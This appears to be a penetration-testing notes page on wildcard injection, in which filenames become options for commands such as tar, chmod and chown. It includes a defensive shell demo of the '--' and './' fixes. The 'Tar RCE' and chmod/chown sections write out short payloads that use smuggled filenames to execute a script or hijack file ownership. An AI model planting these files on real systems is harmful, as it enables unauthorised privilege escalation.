# Wildcard Injection

{% embed url="https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/" %}

If you have a file named `--help` in the current directory and you run the command `cat *`, then instead of the contents of the `--help` file, the `cat` command’s help page will be printed. This is because the shell expands the asterisk to `--help` before `cat` ever runs, and `cat` has no way of knowing that the argument was meant as a file name rather than a flag.

For programs that are run by a privileged user with an asterisk in their arguments, and that have flags with dangerous side effects, this can lead to privesc (for example `chown` and `tar`). This vulnerability is often found in automatic cronjobs run by the admin.

**Note**: The above-described vulnerability wouldn't work if the command was `cat somedirectory/*`, because it would expand to `cat somedirectory/--help`, which no longer starts with a dash. Naming the file ` --help` (with a space in front of the dashes) won't help, either, because the argument then starts with a space and is treated as an ordinary file name.
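The following is an added example, not part of the original page, that shows the mechanism from the defender's side: a small getopt-style argument classifier (a stand-in for `cat`, `tar` or `chmod`) is given a bare glob, a glob preceded by `--`, and a glob anchored with `./`, in a scratch directory constructed to contain a file called `--help`. The two safe idioms are the fix for any script or cronjob that passes `*` to a command, including the `tar` and `chmod`/`chown` cases described below. `classify_args`, `run_unsafe`, `run_dashdash` and `run_dotslash` are names chosen for this example.

```shell
#!/bin/sh
# Added example (not from the original page): how glob expansion turns a
# filename into an option, and the two idioms that prevent it.

# Mimics how a getopt-style tool classifies its argument list: anything
# beginning with "-" is an option until a bare "--" is seen, after which
# every remaining argument is a file operand. Prints "options=N files=M".
classify_args() {
    opts=0; files=0; end_of_opts=0
    for arg in "$@"; do
        if [ "$end_of_opts" -eq 0 ] && [ "$arg" = "--" ]; then
            end_of_opts=1
            continue
        fi
        case "$arg" in
            -*) if [ "$end_of_opts" -eq 0 ]; then opts=$((opts + 1)); else files=$((files + 1)); fi ;;
            *)  files=$((files + 1)) ;;
        esac
    done
    printf 'options=%s files=%s\n' "$opts" "$files"
}

# Constructed scratch directory: one ordinary file plus a filename chosen
# to look like a long option, the situation the page describes.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
touch "$demo_dir/normal.txt" "$demo_dir/--help"

# Unsafe pattern: bare glob. The shell expands "*" to "--help normal.txt",
# so the option-looking name is parsed as an option by the command.
run_unsafe()   { ( cd "$demo_dir" && classify_args * ); }

# Safe idiom 1: put "--" before the glob so option parsing ends first.
run_dashdash() { ( cd "$demo_dir" && classify_args -- * ); }

# Safe idiom 2: anchor the glob with "./" so no expansion starts with "-".
run_dotslash() { ( cd "$demo_dir" && classify_args ./* ); }

run_unsafe     # options=1 files=1
run_dashdash   # options=0 files=2
run_dotslash   # options=0 files=2
```

The same idioms apply to cron scripts: `tar -cf backup.tar -- *` or `tar -cf backup.tar ./*` never hands a filename to the option parser.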

## Tar RCE

Write the following files to the directory where `tar *` is run:

```
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

## Chmod/chown Privilege Hijack

Add a file with the following filename to the directory where chmod or chown is run with an asterisk:

```
--reference=FILE_YOU_OWN
```

When the chmod or chown command is run, all the files will be changed to have the same permissions/owner as `FILE_YOU_OWN`. You will have to create a file named `FILE_YOU_OWN`, obviously.

**PS! You can use symlinks to change ownership of external files as well.**
